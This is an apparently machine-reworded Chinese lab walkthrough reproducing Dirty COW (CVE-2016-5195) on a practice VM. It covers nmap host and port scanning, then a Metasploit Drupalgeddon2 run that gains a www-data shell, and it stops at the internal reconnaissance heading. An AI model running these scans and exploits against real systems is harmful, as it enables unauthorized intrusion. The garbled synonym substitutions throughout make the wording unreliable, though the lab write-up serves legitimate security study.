脏牛提权（靶机复现）

目次
一、脏牛毛病概述
二、毛病复现
1.nmap信息收集
1.1.检察当前IP所在
1.2.扫描当前网段，找出目标机器
1.3.快速扫描目标机全端口
三、访问收集到的资产
192.168.40.134:80
192.168.40.134:1898
四、msf攻击
1.查找对应exp
2.选择对应exp并配置相干设置
五、内网毛病信息收集
六、毛病利用
方法一
1.上传毛病exp举行利用
2.上传exp
3.编译exp并使用python开启一个bash终端
4.执行编译后的exp
5.su登录root账户
方法二
1.通过排查信息，发现网站配置信息
2.ssh毗连
3.传入exp并编译执行。

---

一、脏牛毛病概述

脏牛毛病，又叫Dirty COW，存在Linux内核中已经有长达9年的时间，在2007年发布的Linux内核版本中就已经存在此毛病。Linux kernel团队在2016年10月18日已经对此举行了修复。
毛病范围
Linux内核 >= 2.6.22（2007年发行，到2016年10月18日才修复）
毛病编号
脏牛的CVE编号是CVE-2016-5195。
毛病危害
低权限用户利用该毛病技能可以在全版本Linux系统上实现本地提权
毛病原理
该毛病详细为，Linux内核的内存子系统在处理写入复制（copy-on-write, COW）时产生了竞争条件（race condition）。
恶意用户可利用此毛病，来获取高权限，对只读内存映射举行写访问。
竞争条件，指的是任务执行序次异常，可导致应用瓦解，或令攻击者有机可乘，进一步执行其他代码。
利用这一毛病，攻击者可在其目标系统提升权限，甚至可能获得root权限。
二、毛病复现

• 环境：同一内网下
  
• 靶机下载：
  

• 
  
  
  
  • 链接：百度网盘 请输入提取码
    
  • 提取码：TBUG
    
  
  

1.nmap信息收集

1.1.检察当前IP所在

1. ┌──(root㉿tubug)-[~/桌面]
2. └─# ifconfig eth0 | grep inet
3.         inet 192.168.40.130  netmask 255.255.255.0  broadcast 192.168.40.255
4.         inet6 fe80::20c:29ff:fe88:e3c  prefixlen 64  scopeid 0x20<link>

复制代码

1.2.扫描当前网段，找出目标机器

1. ┌──(root㉿tubug)-[~/桌面]
2. └─# nmap -sP 192.168.40.0/24
3. /*
4. -s                指定扫描技术
5. -P                ping操作
6. -sP                使用ping操作来寻找存活主机
7. */
9. 发现目标机为：192.168.40.134

复制代码

1.3.快速扫描目标机全端口

1. ┌──(root㉿tubug)-[~/桌面]
2. └─# nmap -sS -p 1-65535 192.168.40.134
3. /*
4. -sS        SYN扫描技术
5. -p  指定端口
6. */

复制代码

三、访问收集到的资产

192.168.40.134:80

192.168.40.134:1898

访问发现关键信息网站指纹：Drupal
四、msf攻击

1.查找对应exp

1. ┌──(root㉿tubug)-[~/桌面]
2. └─# msfconsole
3. msf6 > search drupal

复制代码

2.选择对应exp并配置相干设置

1. msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.40.134
2. msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
3. msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
4. meterpreter > getuid
5. Server username: www-data
7. 该exp漏洞属于远程代码执行漏洞
8. 构造特殊的HTTP请求，将恶意代码注入到网站的表单处理程序中从而执行恶意代码。

复制代码

五、内网毛病信息收集